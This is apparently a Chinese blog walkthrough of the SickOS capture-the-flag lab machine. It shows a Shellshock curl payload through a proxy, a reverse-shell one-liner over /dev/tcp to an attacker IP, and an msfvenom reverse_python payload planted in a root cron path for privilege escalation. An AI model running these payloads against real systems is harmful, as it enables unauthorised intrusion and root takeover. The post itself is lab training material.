靶机精讲之SickOS-方法2

主机发现

 用代理扫描 -useproxy

nikto扫描

-h ip

sudo nikto -h 192.168.10.191 -useproxy http://192.168.10.191/3128

 

 shellshock漏洞原理

 验证有没有shellshock漏洞

查找shellshock漏洞利用方法

用curl挂代理

sudo curl -v --proxy http://192.168.10.191:3128 http://192.168.10.191/cgi-bin/status -H "Referer:(){ test:}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"

shellshock漏洞验证

 

 存在

获取初始系统shell

msfvenom 生成后门

知识点

Kali中的 msfvenom 取代了msfpayload和msfencode,常用于生成后门木马

msfpayload是MSF攻击荷载生成器,用于生成shellcode和可执行代码。

msfencode是MSF编码器。-p 指定需要使用的payload(攻击荷载)。

-f 指定输出格式

Msf中创建木马时使用的LHOST表示的是攻击者地址;LPOST表示的是攻击者端口;RHOST表示的是被攻击地址;RPOST表示的是被攻击端口

生成payload

 建立监听

 执行命令(修改路径)

知识点

curl是一个非常实用的、用来与服务器之间传输数据的工具;支持的协议包括 (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP),curl设计为无用户交互下完成工作;curl提供了一大堆非常有用的功能,包括代理访问、用户认证、ftp上传下载、HTTP POST、SSL连接、cookie支持、断点续传...。

 把上面指令复制

无反应,路径应该要完整

重新开始监听

 加上完整路径sh前加上/bin/

 每个空格字母都要主要

sudo curl -v --proxy http://192.168.10.191:3128 http://192.168.10.191/cgi-bin/status -H "Referer:() { test;}; 0<&108-;exec 108<>/dev/tcp/192.168.10.153/443;/bin/sh <&108 >&108 2>&108"

反弹成功,半个shell

 

 dpkg -l 查看装的软件

运行python,获得更好的shell

 看权限

 返回翻文件

 

 

 翻网站

 看目录

 

 执行python

 执行ls liah cr*(检索关键字)

Cron自动任务提权

cat crontab

****root,定时命令

可以把命令植入该路径

 生成payload

sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.10.153 lport=444 -f raw

rooted

 把python -c后的生成码粘贴不带“

 

 输入o,然后粘贴payload

 (靶机环境崩坏,结束做笔记)

 

 回弹拿shell成功

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值